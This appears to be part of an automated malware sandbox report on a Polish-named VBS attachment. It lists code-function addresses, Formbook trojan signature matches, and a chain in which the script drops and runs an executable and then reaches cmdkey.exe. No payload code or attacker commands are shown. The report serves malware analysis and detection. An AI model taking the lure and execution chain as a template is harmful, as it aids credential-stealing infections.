        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D528C03_2_32D528C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D668823_2_32D66882
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC98B23_2_32DC98B2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0F8723_2_32E0F872
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D598703_2_32D59870
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B8703_2_32D6B870
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D368683_2_32D36868
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D538003_2_32D53800
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DF08353_2_32DF0835
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0E9A63_2_32E0E9A6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4E9A03_2_32D4E9A0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E09ED23_2_32E09ED2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D42EE83_2_32D42EE8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E00EAD3_2_32E00EAD
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D51EB23_2_32D51EB2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D70E503_2_32D70E50
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DF0E6D3_2_32DF0E6D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E01FC63_2_32E01FC6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D56FE03_2_32D56FE0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0EFBF3_2_32E0EFBF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0FF633_2_32E0FF63
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5CF003_2_32D5CF00
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D68CDF3_2_32D68CDF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1ACEB3_2_32E1ACEB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6FCE03_2_32D6FCE0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DE9C983_2_32DE9C98
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0EC603_2_32E0EC60
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E06C693_2_32E06C69
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFEC4C3_2_32DFEC4C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D53C603_2_32D53C60
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D40C123_2_32D40C12
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5AC203_2_32D5AC20
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D59DD03_2_32D59DD0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DEFDF43_2_32DEFDF4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D62DB03_2_32D62DB0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E07D4C3_2_32E07D4C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50D693_2_32D50D69
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0FD273_2_32E0FD27
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4AD003_2_32D4AD00
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3E3D53_2_32A3E3D5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3E88C3_2_32A3E88C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3E4F33_2_32A3E4F3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3D8F83_2_32A3D8F8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038413805_2_03841380
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385E3105_2_0385E310
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F3305_2_0390F330
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0383D2EC5_2_0383D2EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390124C5_2_0390124C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038551C05_2_038551C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386B1E05_2_0386B1E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0383F1135_2_0383F113
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0391010E5_2_0391010E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038ED1305_2_038ED130
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0389717A5_2_0389717A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038400A05_2_038400A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385B0D05_2_0385B0D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039070F15_2_039070F1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FE0765_2_038FE076
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039067575_2_03906757
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038527605_2_03852760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385A7605_2_0385A760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038506805_2_03850680
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390A6C05_2_0390A6C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C36EC5_2_038C36EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384C6E05_2_0384C6E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F6F65_2_0390F6F6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386C6005_2_0386C600
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038ED62C5_2_038ED62C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FD6465_2_038FD646
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038746705_2_03874670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039075C65_2_039075C6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F5C95_2_0390F5C9
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0391A5265_2_0391A526
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038504455_2_03850445
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C4BC05_2_038C4BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03850B105_2_03850B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FB2E5_2_0390FB2E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FA895_2_0390FA89
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386FAA05_2_0386FAA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390CA135_2_0390CA13
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EA5B5_2_0390EA5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384E9A05_2_0384E9A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390E9A65_2_0390E9A6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038668825_2_03866882
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C98B25_2_038C98B2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038528C05_2_038528C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039018DA5_2_039018DA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039078F35_2_039078F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038538005_2_03853800
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F08355_2_038F0835
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F8725_2_0390F872
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038368685_2_03836868
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038598705_2_03859870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386B8705_2_0386B870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EFBF5_2_0390EFBF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03901FC65_2_03901FC6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03856FE05_2_03856FE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385CF005_2_0385CF00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FF635_2_0390FF63
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03851EB25_2_03851EB2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03900EAD5_2_03900EAD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03909ED25_2_03909ED2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03842EE85_2_03842EE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03870E505_2_03870E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F0E6D5_2_038F0E6D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03862DB05_2_03862DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03859DD05_2_03859DD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038EFDF45_2_038EFDF4
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384AD005_2_0384AD00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FD275_2_0390FD27
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03907D4C5_2_03907D4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03850D695_2_03850D69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038E9C985_2_038E9C98
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03868CDF5_2_03868CDF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386FCE05_2_0386FCE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0391ACEB5_2_0391ACEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03840C125_2_03840C12
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385AC205_2_0385AC20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FEC4C5_2_038FEC4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03853C605_2_03853C60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EC605_2_0390EC60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03906C695_2_03906C69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371F0AD5_2_0371F0AD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E3D55_2_0371E3D5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371D8F85_2_0371D8F8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E88C5_2_0371E88C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E4F35_2_0371E4F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03897BE4 appears 88 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 038CEF10 appears 102 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0383B910 appears 266 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 038BE692 appears 84 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03885050 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: String function: 32D85050 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: String function: 32DCEF10 appears 99 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: String function: 32D3B910 appears 265 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: String function: 32DBE692 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: String function: 32D97BE4 appears 84 times
        Source: Zeskanowana lista przedmiot#U00f3w nr 84329.vbsInitial sample: Strings found which are bigger than 50
        Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: wscript.exe, 00000000.00000003.19732112682.000002156FD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733444126.000002156FDAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19745616939.000002156FDAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732614950.000002156FD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733082746.000002156FD81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *...GjhADa0...sLn1;;;Op5
        Source: wscript.exe, 00000000.00000003.19724635083.000002156FF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19702139822.000002157046A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19726805382.000002156FF48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19702730929.0000021570487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19726031346.000002156FF47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19697552235.000002157042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19720152791.000002156FE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19721127089.000002156FEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19727190383.000002156FF4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19723537096.000002156FEE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19722569290.000002156FED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Da0...sLn1;;;O))in2+GzOm+vhiDP
        Source: wscript.exe, 00000000.00000003.19743881979.0000021570466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19743308554.0000021570465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734485655.0000021570423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734829954.0000021570435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19738699805.0000021570460000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19735744514.0000021570454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *...GjhADa0...sLn1;;;OmG
        Source: classification engineClassification label: mal100.troj.evad.winVBS@7/11@1/1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,2_2_004036D7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,3_2_004036D7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_00404060 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,2_2_00404060
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_0040234F CoCreateInstance,2_2_0040234F
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
